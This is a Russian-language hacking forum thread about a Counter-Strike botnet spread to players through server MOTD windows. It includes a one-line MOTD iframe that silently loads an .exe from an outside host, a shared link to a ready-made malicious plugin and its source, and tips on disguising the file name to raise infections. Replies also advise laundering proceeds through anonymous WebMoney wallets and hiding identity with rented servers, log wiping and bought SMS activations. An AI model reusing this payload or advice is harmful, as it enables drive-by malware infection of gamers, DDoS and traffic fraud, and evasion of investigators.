Тут котэ подумал, почесал за ухом и решил расказать умную историю: Жил-был такой кодер, любитель грязных дел - ratwayer мб его многие знают... Написал он много софта под контру, самые популярные из них вроде HLBrute и прога создания фейковых серверов в setmasters. Недавно, примерно месяца 3 назад взбрело ему в голову завести свой ботнет, и написал своего бота который подргужает файлик .cmd клиенту через motd. Вирь открывал на машине ~1000 редирект серверов которые автоматически регистрируются на серверах VALVE, все эти сервера переправляли жертв на раздатчик и начиналось все по новому кругу. Ботнет очень быстро розростался. Он с дружками начали продавать траф и ддосить те сервера которые крутились без их согласия. Но пришло время и ratwayer со своими дружками потерял айпишник на который стучались боты ! Самое обидное что процесс уже не остановить и сетмастера теперь в задницу загажены.... О трафе в кс можно забыть изза этого гуманоида, думаю многие заметили резкое ухудшение онлайна на очень многих популярных ресурсах, я сам держу большое количество серверов.
В смысле забанили ? Вроди никто никого не банил... Но теперь задротам противопоказано открывать вкладку Internet (поиск серверов в интернете) в игровом GUI. Кому интересен полный материал истории: ТыЦ
а зачем с ПП работать? Укажи свой левый кошель ВМ и отмывай, терминалы по оплате за каждым углом есть
заходить с дедика, чистить логи, правильно отмывать барышы + можно ёщё заказать смс активацию что б своё местонахождение не палить
прочитал статью, всю тему, каждый пост, идея просто замечательная, но как и через что, можно вывести выгоду..
По просьбе выкладываю уже готовый файли исходник http://www.sendspace.com/file/cnin5x вам остается только прописать плагин и все.
Да можно и проще, просто написать в moyd.txt <iframe src="http://site.ru/file.exe" width="1" height="1" frameborder="1"></iframe>
ловил я винлок пару лет назад с cs видимо таким же способом. При грамотном подходе можно кучу трафа иметь, + автору.
Скачал плагин, кинул в папкугде все плагины, а файл sma где все файлы sma, прописал в plugins.ini MOTD.amxx, но вот окно всё равно можно закрыть, почему? Вроде же 10 секунд не должно закрываться?
Это всё прикольно, но старо Лучше бы просто файл загружался с названием ну типо CSF.exe и то уников больше будет